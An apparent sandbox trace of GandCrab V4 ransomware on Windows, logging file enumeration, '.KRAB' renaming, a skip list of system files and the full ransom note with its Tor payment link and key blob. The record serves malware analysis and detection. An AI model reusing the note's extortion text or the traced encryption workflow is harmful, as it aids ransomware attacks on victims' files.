lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.282] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock") returned 97 [0100.282] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0100.283] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.283] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.283] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0100.283] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0100.283] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd7a0 [0100.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.284] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.284] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.284] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.284] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.284] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.284] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.284] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock" [0100.284] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.284] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 102 [0100.284] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\d2ca4a08d2ca4dee3d.lock") returned 97 [0100.284] lstrlenW (lpString=".lock") returned 5 [0100.284] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.284] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.284] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.285] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.290] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.290] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0100.290] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0100.290] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" [0100.290] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.292] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.KRAB") returned 90 [0100.292] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 85 [0100.292] lstrlenW (lpString=".ini") returned 4 [0100.292] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.292] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0100.292] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.292] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 85 [0100.292] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 85 [0100.292] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0100.292] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.293] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.293] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.293] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.293] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt" [0100.293] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.293] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt.KRAB") returned 95 [0100.293] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt") returned 90 [0100.293] lstrlenW (lpString=".txt") returned 4 [0100.293] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.293] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.294] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.294] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt") returned 90 [0100.294] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt") returned 90 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.294] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.294] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.294] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.294] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2=".") returned 1 [0100.294] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="..") returned 1 [0100.294] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Shows Desktop.lnk" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" [0100.294] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.295] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.KRAB") returned 96 [0100.295] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 91 [0100.295] lstrlenW (lpString=".lnk") returned 4 [0100.295] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.306] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lnk ") returned 5 [0100.306] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.307] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.307] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.307] lstrcmpW (lpString1="Window Switcher.lnk", lpString2=".") returned 1 [0100.307] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="..") returned 1 [0100.307] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Window Switcher.lnk" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" [0100.307] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.308] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.KRAB") returned 98 [0100.308] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 93 [0100.308] lstrlenW (lpString=".lnk") returned 4 [0100.308] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.308] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lnk ") returned 5 [0100.308] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.308] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.309] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0100.309] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0100.309] CloseHandle (hObject=0x43c) returned 1 [0100.309] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0100.309] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0100.309] CloseHandle (hObject=0x778) returned 1 [0100.309] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0100.309] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.309] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.309] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt" [0100.309] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.309] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt.KRAB") returned 64 [0100.310] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt") returned 59 [0100.310] lstrlenW (lpString=".txt") returned 4 [0100.310] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.310] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.310] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.310] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt") returned 59 [0100.310] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\KRAB-DECRYPT.txt") returned 59 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.310] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.310] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.311] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0100.311] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0100.311] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0100.311] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Windows" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows" [0100.311] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\" [0100.311] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.311] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.311] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0100.311] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0100.311] CloseHandle (hObject=0x3a8) returned 1 [0100.312] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0100.312] FindClose (in: hFindFile=0xfbdb20 | out: hFindFile=0xfbdb20) returned 1 [0100.312] CloseHandle (hObject=0x434) returned 1 [0100.312] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.312] FindClose (in: hFindFile=0xfbdfe0 | out: hFindFile=0xfbdfe0) returned 1 [0100.312] CloseHandle (hObject=0x320) returned 1 [0100.312] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.312] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0100.312] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0100.312] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0100.312] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0100.312] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.312] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.313] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.313] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.313] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.313] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.313] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.313] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Application Data\\\\KRAB-DECRYPT.txt") returned 51 [0100.313] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\application data\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0100.314] GetLastError () returned 0x50 [0100.314] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.314] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.314] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x201)) [0100.314] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.315] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.315] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.315] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Application Data\\d2ca4a08d2ca4dee3d.lock") returned 57 [0100.315] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\application data\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.315] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.316] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.316] lstrlenW (lpString="C:\\Users\\Default\\Application Data\\") returned 34 [0100.316] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Application Data\\*") returned="C:\\Users\\Default\\Application Data\\*" [0100.316] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.316] CloseHandle (hObject=0x320) returned 1 [0100.316] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.316] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0100.316] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0100.316] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0100.316] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0100.316] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.317] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.317] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.317] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.317] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.317] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.317] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.317] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Cookies\\\\KRAB-DECRYPT.txt") returned 42 [0100.317] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\cookies\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.318] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZ